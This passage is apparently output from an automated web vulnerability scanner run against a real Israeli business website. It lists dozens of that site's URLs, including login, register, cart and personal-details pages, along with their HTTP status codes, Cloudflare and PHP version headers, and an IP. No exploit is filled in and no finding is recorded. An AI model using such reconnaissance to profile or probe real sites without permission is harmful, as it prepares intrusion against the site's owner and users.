  1881. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1882. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.cu ID: 003917828085772992913:gmoeray5sa8 ]
  1883.  
  1884. [ INFO ][ SEARCHING ]:: 
  1885. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1886.  
  1887. [ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
  1888.  
  1889. 
  1890.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1891. |_[ + ] [ 0 / 100 ]-[05:18:36] [ - ] 
  1892. |_[ + ] Target:: [ https://www.flybox.co.il/ ]
  1893. |_[ + ] Exploit:: 
  1894. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  1895. |_[ + ] More details:: 
  1896. |_[ + ] Found:: UNIDENTIFIED
  1897. 
  1898.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1899. |_[ + ] [ 1 / 100 ]-[05:18:37] [ - ] 
  1900. |_[ + ] Target:: [ https://www.flybox.co.il/en/ ]
  1901. |_[ + ] Exploit:: 
  1902. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  1903. |_[ + ] More details:: 
  1904. |_[ + ] Found:: UNIDENTIFIED
  1905. 
  1906.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1907. |_[ + ] [ 2 / 100 ]-[05:18:38] [ - ] 
  1908. |_[ + ] Target:: [ https://www.flybox.co.il/events/ ]
  1909. |_[ + ] Exploit:: 
  1910. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  1911. |_[ + ] More details:: 
  1912. |_[ + ] Found:: UNIDENTIFIED
  1913. 
  1914.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1915. |_[ + ] [ 3 / 100 ]-[05:18:38] [ - ] 
  1916. |_[ + ] Target:: [ https://www.flybox.co.il/מק׊וענים/ ]
  1917. |_[ + ] Exploit:: 
  1918. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  1919. |_[ + ] More details:: 
  1920. |_[ + ] Found:: UNIDENTIFIED
  1921. 
  1922.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1923. |_[ + ] [ 4 / 100 ]-[05:18:38] [ - ] 
  1924. |_[ + ] Target:: [ https://www.flybox.co.il/restaurant/ ]
  1925. |_[ + ] Exploit:: 
  1926. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  1927. |_[ + ] More details:: 
  1928. |_[ + ] Found:: UNIDENTIFIED
  1929. 
  1930.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1931. |_[ + ] [ 5 / 100 ]-[05:18:39] [ - ] 
  1932. |_[ + ] Target:: [ https://www.flybox.co.il/מי_יכול_לעוף/ ]
  1933. |_[ + ] Exploit:: 
  1934. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  1935. |_[ + ] More details:: 
  1936. |_[ + ] Found:: UNIDENTIFIED
  1937. 
  1938.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1939. |_[ + ] [ 6 / 100 ]-[05:18:39] [ - ] 
  1940. |_[ + ] Target:: [ https://www.flybox.co.il/בלוג/ ]
  1941. |_[ + ] Exploit:: 
  1942. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  1943. |_[ + ] More details:: 
  1944. |_[ + ] Found:: UNIDENTIFIED
  1945. 
  1946.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1947. |_[ + ] [ 7 / 100 ]-[05:18:40] [ - ] 
  1948. |_[ + ] Target:: [ https://www.flybox.co.il/kids/ ]
  1949. |_[ + ] Exploit:: 
  1950. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  1951. |_[ + ] More details:: 
  1952. |_[ + ] Found:: UNIDENTIFIED
  1953. 
  1954.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1955. |_[ + ] [ 8 / 100 ]-[05:18:40] [ - ] 
  1956. |_[ + ] Target:: [ https://www.flybox.co.il/terms/ ]
  1957. |_[ + ] Exploit:: 
  1958. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  1959. |_[ + ] More details:: 
  1960. |_[ + ] Found:: UNIDENTIFIED
  1961. 
  1962.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1963. |_[ + ] [ 9 / 100 ]-[05:18:40] [ - ] 
  1964. |_[ + ] Target:: [ https://www.flybox.co.il/faq/ ]
  1965. |_[ + ] Exploit:: 
  1966. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  1967. |_[ + ] More details:: 
  1968. |_[ + ] Found:: UNIDENTIFIED
  1969. 
  1970.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1971. |_[ + ] [ 10 / 100 ]-[05:18:41] [ - ] 
  1972. |_[ + ] Target:: [ https://www.flybox.co.il/instructors/ ]
  1973. |_[ + ] Exploit:: 
  1974. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  1975. |_[ + ] More details:: 
  1976. |_[ + ] Found:: UNIDENTIFIED
  1977. 
  1978.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1979. |_[ + ] [ 11 / 100 ]-[05:18:42] [ - ] 
  1980. |_[ + ] Target:: [ https://www.flybox.co.il/personal_details/ ]
  1981. |_[ + ] Exploit:: 
  1982. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  1983. |_[ + ] More details:: 
  1984. |_[ + ] Found:: UNIDENTIFIED
  1985. 
  1986.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1987. |_[ + ] [ 12 / 100 ]-[05:18:43] [ - ] 
  1988. |_[ + ] Target:: [ https://www.flybox.co.il/en/terms/ ]
  1989. |_[ + ] Exploit:: 
  1990. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  1991. |_[ + ] More details:: 
  1992. |_[ + ] Found:: UNIDENTIFIED
  1993. 
  1994.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1995. |_[ + ] [ 13 / 100 ]-[05:18:44] [ - ] 
  1996. |_[ + ] Target:: [ https://www.flybox.co.il/en/restaurant/ ]
  1997. |_[ + ] Exploit:: 
  1998. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  1999. |_[ + ] More details:: 
  2000. |_[ + ] Found:: UNIDENTIFIED
  2001. 
  2002.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2003. |_[ + ] [ 14 / 100 ]-[05:18:45] [ - ] 
  2004. |_[ + ] Target:: [ https://www.flybox.co.il/en/kids/ ]
  2005. |_[ + ] Exploit:: 
  2006. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2007. |_[ + ] More details:: 
  2008. |_[ + ] Found:: UNIDENTIFIED
  2009. 
  2010.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2011. |_[ + ] [ 15 / 100 ]-[05:18:45] [ - ] 
  2012. |_[ + ] Target:: [ https://www.flybox.co.il/׀לייבוקס-בתקשוךת/ ]
  2013. |_[ + ] Exploit:: 
  2014. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2015. |_[ + ] More details:: 
  2016. |_[ + ] Found:: UNIDENTIFIED
  2017. 
  2018.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2019. |_[ + ] [ 16 / 100 ]-[05:18:46] [ - ] 
  2020. |_[ + ] Target:: [ https://www.flybox.co.il/social-events/ ]
  2021. |_[ + ] Exploit:: 
  2022. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2023. |_[ + ] More details:: 
  2024. |_[ + ] Found:: UNIDENTIFIED
  2025. 
  2026.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2027. |_[ + ] [ 17 / 100 ]-[05:18:47] [ - ] 
  2028. |_[ + ] Target:: [ https://www.flybox.co.il/en/personal_details/ ]
  2029. |_[ + ] Exploit:: 
  2030. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2031. |_[ + ] More details:: 
  2032. |_[ + ] Found:: UNIDENTIFIED
  2033. 
  2034.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2035. |_[ + ] [ 18 / 100 ]-[05:18:48] [ - ] 
  2036. |_[ + ] Target:: [ https://www.flybox.co.il/parties-events/ ]
  2037. |_[ + ] Exploit:: 
  2038. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2039. |_[ + ] More details:: 
  2040. |_[ + ] Found:: UNIDENTIFIED
  2041. 
  2042.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2043. |_[ + ] [ 19 / 100 ]-[05:18:49] [ - ] 
  2044. |_[ + ] Target:: [ https://www.flybox.co.il/en/מי_יכול_לעוף/ ]
  2045. |_[ + ] Exploit:: 
  2046. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2047. |_[ + ] More details:: 
  2048. |_[ + ] Found:: UNIDENTIFIED
  2049. 
  2050.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2051. |_[ + ] [ 20 / 100 ]-[05:18:51] [ - ] 
  2052. |_[ + ] Target:: [ https://www.flybox.co.il/en/events/ ]
  2053. |_[ + ] Exploit:: 
  2054. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2055. |_[ + ] More details:: 
  2056. |_[ + ] Found:: UNIDENTIFIED
  2057. 
  2058.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2059. |_[ + ] [ 21 / 100 ]-[05:18:52] [ - ] 
  2060. |_[ + ] Target:: [ https://www.flybox.co.il/en/בלוג/ ]
  2061. |_[ + ] Exploit:: 
  2062. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2063. |_[ + ] More details:: 
  2064. |_[ + ] Found:: UNIDENTIFIED
  2065. 
  2066.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2067. |_[ + ] [ 22 / 100 ]-[05:18:54] [ - ] 
  2068. |_[ + ] Target:: [ https://www.flybox.co.il/en/faq/ ]
  2069. |_[ + ] Exploit:: 
  2070. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2071. |_[ + ] More details:: 
  2072. |_[ + ] Found:: UNIDENTIFIED
  2073. 
  2074.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2075. |_[ + ] [ 23 / 100 ]-[05:18:55] [ - ] 
  2076. |_[ + ] Target:: [ https://www.flybox.co.il/en/מק׊וענים/ ]
  2077. |_[ + ] Exploit:: 
  2078. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2079. |_[ + ] More details:: 
  2080. |_[ + ] Found:: UNIDENTIFIED
  2081. 
  2082.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2083. |_[ + ] [ 24 / 100 ]-[05:18:57] [ - ] 
  2084. |_[ + ] Target:: [ https://www.flybox.co.il/en/instructors/ ]
  2085. |_[ + ] Exploit:: 
  2086. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2087. |_[ + ] More details:: 
  2088. |_[ + ] Found:: UNIDENTIFIED
  2089. 
  2090.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2091. |_[ + ] [ 25 / 100 ]-[05:18:57] [ - ] 
  2092. |_[ + ] Target:: [ https://www.flybox.co.il/gift-packages/ ]
  2093. |_[ + ] Exploit:: 
  2094. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2095. |_[ + ] More details:: 
  2096. |_[ + ] Found:: UNIDENTIFIED
  2097. 
  2098.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2099. |_[ + ] [ 26 / 100 ]-[05:18:58] [ - ] 
  2100. |_[ + ] Target:: [ https://www.flybox.co.il/en/parties-events/ ]
  2101. |_[ + ] Exploit:: 
  2102. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2103. |_[ + ] More details:: 
  2104. |_[ + ] Found:: UNIDENTIFIED
  2105. 
  2106.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2107. |_[ + ] [ 27 / 100 ]-[05:18:59] [ - ] 
  2108. |_[ + ] Target:: [ https://www.flybox.co.il/שובךים/ ]
  2109. |_[ + ] Exploit:: 
  2110. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2111. |_[ + ] More details:: 
  2112. |_[ + ] Found:: UNIDENTIFIED
  2113. 
  2114.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2115. |_[ + ] [ 28 / 100 ]-[05:18:59] [ - ] 
  2116. |_[ + ] Target:: [ https://www.flybox.co.il/cart/ ]
  2117. |_[ + ] Exploit:: 
  2118. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2119. |_[ + ] More details:: 
  2120. |_[ + ] Found:: UNIDENTIFIED
  2121. 
  2122.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2123. |_[ + ] [ 29 / 100 ]-[05:19:00] [ - ] 
  2124. |_[ + ] Target:: [ https://www.flybox.co.il/logbook/ ]
  2125. |_[ + ] Exploit:: 
  2126. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2127. |_[ + ] More details:: 
  2128. |_[ + ] Found:: UNIDENTIFIED
  2129. 
  2130.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2131. |_[ + ] [ 30 / 100 ]-[05:19:01] [ - ] 
  2132. |_[ + ] Target:: [ https://www.flybox.co.il/personal_details_coupon/ ]
  2133. |_[ + ] Exploit:: 
  2134. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2135. |_[ + ] More details:: 
  2136. |_[ + ] Found:: UNIDENTIFIED
  2137. 
  2138.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2139. |_[ + ] [ 31 / 100 ]-[05:19:01] [ - ] 
  2140. |_[ + ] Target:: [ https://www.flybox.co.il/register/ ]
  2141. |_[ + ] Exploit:: 
  2142. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2143. |_[ + ] More details:: 
  2144. |_[ + ] Found:: UNIDENTIFIED
  2145. 
  2146.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2147. |_[ + ] [ 32 / 100 ]-[05:19:02] [ - ] 
  2148. |_[ + ] Target:: [ https://www.flybox.co.il/תעו׀ה-מתקדמת-איךועים/ ]
  2149. |_[ + ] Exploit:: 
  2150. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2151. |_[ + ] More details:: 
  2152. |_[ + ] Found:: UNIDENTIFIED
  2153. 
  2154.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2155. |_[ + ] [ 33 / 100 ]-[05:19:02] [ - ] 
  2156. |_[ + ] Target:: [ https://www.flybox.co.il/login/ ]
  2157. |_[ + ] Exploit:: 
  2158. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2159. |_[ + ] More details:: 
  2160. |_[ + ] Found:: UNIDENTIFIED
  2161. 
  2162.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2163. |_[ + ] [ 34 / 100 ]-[05:19:03] [ - ] 
  2164. |_[ + ] Target:: [ https://www.flybox.co.il/en/׀לייבוקס-בתקשוךת/ ]
  2165. |_[ + ] Exploit:: 
  2166. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2167. |_[ + ] More details:: 
  2168. |_[ + ] Found:: UNIDENTIFIED
  2169. 
  2170.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2171. |_[ + ] [ 35 / 100 ]-[05:19:03] [ - ] 
  2172. |_[ + ] Target:: [ https://www.flybox.co.il/blog/ ]
  2173. |_[ + ] Exploit:: 
  2174. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2175. |_[ + ] More details:: 
  2176. |_[ + ] Found:: UNIDENTIFIED
  2177. 
  2178.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2179. |_[ + ] [ 36 / 100 ]-[05:19:04] [ - ] 
  2180. |_[ + ] Target:: [ https://www.flybox.co.il/forgot/ ]
  2181. |_[ + ] Exploit:: 
  2182. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2183. |_[ + ] More details:: 
  2184. |_[ + ] Found:: UNIDENTIFIED
  2185. 
  2186.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2187. |_[ + ] [ 37 / 100 ]-[05:19:04] [ - ] 
  2188. |_[ + ] Target:: [ https://www.flybox.co.il/health/ ]
  2189. |_[ + ] Exploit:: 
  2190. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2191. |_[ + ] More details:: 
  2192. |_[ + ] Found:: UNIDENTIFIED
  2193. 
  2194.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2195. |_[ + ] [ 38 / 100 ]-[05:19:04] [ - ] 
  2196. |_[ + ] Target:: [ https://www.flybox.co.il/׹ושים-לעוף-שוב/ ]
  2197. |_[ + ] Exploit:: 
  2198. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2199. |_[ + ] More details:: 
  2200. |_[ + ] Found:: UNIDENTIFIED
  2201. 
  2202.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2203. |_[ + ] [ 39 / 100 ]-[05:19:06] [ - ] 
  2204. |_[ + ] Target:: [ https://www.flybox.co.il/en/gift-packages/ ]
  2205. |_[ + ] Exploit:: 
  2206. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2207. |_[ + ] More details:: 
  2208. |_[ + ] Found:: UNIDENTIFIED
  2209. 
  2210.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2211. |_[ + ] [ 40 / 100 ]-[05:19:06] [ - ] 
  2212. |_[ + ] Target:: [ https://www.flybox.co.il/contact/ ]
  2213. |_[ + ] Exploit:: 
  2214. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2215. |_[ + ] More details:: 
  2216. |_[ + ] Found:: UNIDENTIFIED
  2217. 
  2218.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2219. |_[ + ] [ 41 / 100 ]-[05:19:07] [ - ] 
  2220. |_[ + ] Target:: [ https://www.flybox.co.il/unsubsribe/ ]
  2221. |_[ + ] Exploit:: 
  2222. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2223. |_[ + ] More details:: 
  2224. |_[ + ] Found:: UNIDENTIFIED
  2225. 
  2226.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2227. |_[ + ] [ 42 / 100 ]-[05:19:08] [ - ] 
  2228. |_[ + ] Target:: [ https://www.flybox.co.il/en/social-events/ ]
  2229. |_[ + ] Exploit:: 
  2230. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2231. |_[ + ] More details:: 
  2232. |_[ + ] Found:: UNIDENTIFIED
  2233. 
  2234.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2235. |_[ + ] [ 43 / 100 ]-[05:19:08] [ - ] 
  2236. |_[ + ] Target:: [ https://www.flybox.co.il/packages/ ]
  2237. |_[ + ] Exploit:: 
  2238. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2239. |_[ + ] More details:: 
  2240. |_[ + ] Found:: UNIDENTIFIED
  2241. 
  2242.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2243. |_[ + ] [ 44 / 100 ]-[05:19:09] [ - ] 
  2244. |_[ + ] Target:: [ https://www.flybox.co.il/upsells/ ]
  2245. |_[ + ] Exploit:: 
  2246. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2247. |_[ + ] More details:: 
  2248. |_[ + ] Found:: UNIDENTIFIED
  2249. 
  2250.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2251. |_[ + ] [ 45 / 100 ]-[05:19:10] [ - ] 
  2252. |_[ + ] Target:: [ https://www.flybox.co.il/en/תעו׀ה-מתקדמת-איךועים/ ]
  2253. |_[ + ] Exploit:: 
  2254. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2255. |_[ + ] More details:: 
  2256. |_[ + ] Found:: UNIDENTIFIED
  2257. 
  2258.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2259. |_[ + ] [ 46 / 100 ]-[05:19:10] [ - ] 
  2260. |_[ + ] Target:: [ https://www.flybox.co.il/מה-היא-מנהךת-׹וח/ ]
  2261. |_[ + ] Exploit:: 
  2262. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2263. |_[ + ] More details:: 
  2264. |_[ + ] Found:: UNIDENTIFIED
  2265. 
  2266.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2267. |_[ + ] [ 47 / 100 ]-[05:19:11] [ - ] 
  2268. |_[ + ] Target:: [ https://www.flybox.co.il/en/blog/ ]
  2269. |_[ + ] Exploit:: 
  2270. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2271. |_[ + ] More details:: 
  2272. |_[ + ] Found:: UNIDENTIFIED
  2273. 
  2274.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2275. |_[ + ] [ 48 / 100 ]-[05:19:11] [ - ] 
  2276. |_[ + ] Target:: [ https://www.flybox.co.il/gallery-photos/ ]
  2277. |_[ + ] Exploit:: 
  2278. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2279. |_[ + ] More details:: 
  2280. |_[ + ] Found:: UNIDENTIFIED
  2281. 
  2282.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2283. |_[ + ] [ 49 / 100 ]-[05:19:12] [ - ] 
  2284. |_[ + ] Target:: [ https://www.flybox.co.il/gallery-videos/ ]
  2285. |_[ + ] Exploit:: 
  2286. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2287. |_[ + ] More details:: 
  2288. |_[ + ] Found:: UNIDENTIFIED
  2289. 
  2290.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2291. |_[ + ] [ 50 / 100 ]-[05:19:13] [ - ] 
  2292. |_[ + ] Target:: [ https://www.flybox.co.il/en/login/ ]
  2293. |_[ + ] Exploit:: 
  2294. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2295. |_[ + ] More details:: 
  2296. |_[ + ] Found:: UNIDENTIFIED
  2297. 
  2298.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2299. |_[ + ] [ 51 / 100 ]-[05:19:13] [ - ] 
  2300. |_[ + ] Target:: [ https://www.flybox.co.il/en/cart/ ]
  2301. |_[ + ] Exploit:: 
  2302. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2303. |_[ + ] More details:: 
  2304. |_[ + ] Found:: UNIDENTIFIED
  2305. 
  2306.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2307. |_[ + ] [ 52 / 100 ]-[05:19:15] [ - ] 
  2308. |_[ + ] Target:: [ https://www.flybox.co.il/en/contact/ ]
  2309. |_[ + ] Exploit:: 
  2310. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2311. |_[ + ] More details:: 
  2312. |_[ + ] Found:: UNIDENTIFIED
  2313. 
  2314.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2315. |_[ + ] [ 53 / 100 ]-[05:19:16] [ - ] 
  2316. |_[ + ] Target:: [ https://www.flybox.co.il/en/register/ ]
  2317. |_[ + ] Exploit:: 
  2318. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2319. |_[ + ] More details:: 
  2320. |_[ + ] Found:: UNIDENTIFIED
  2321. 
  2322.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2323. |_[ + ] [ 54 / 100 ]-[05:19:16] [ - ] 
  2324. |_[ + ] Target:: [ https://www.flybox.co.il/selected-package/ ]
  2325. |_[ + ] Exploit:: 
  2326. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2327. |_[ + ] More details:: 
  2328. |_[ + ] Found:: UNIDENTIFIED
  2329. 
  2330.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2331. |_[ + ] [ 55 / 100 ]-[05:19:17] [ - ] 
  2332. |_[ + ] Target:: [ https://www.flybox.co.il/en/health/ ]
  2333. |_[ + ] Exploit:: 
  2334. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2335. |_[ + ] More details:: 
  2336. |_[ + ] Found:: UNIDENTIFIED
  2337. 
  2338.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2339. |_[ + ] [ 56 / 100 ]-[05:19:19] [ - ] 
  2340. |_[ + ] Target:: [ https://www.flybox.co.il/en/logbook/ ]
  2341. |_[ + ] Exploit:: 
  2342. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare X-Powered-By: PHP/7.0.13, IP:2400:cb00:2048:1::681f:4bef:443 
  2343. |_[ + ] More details:: 
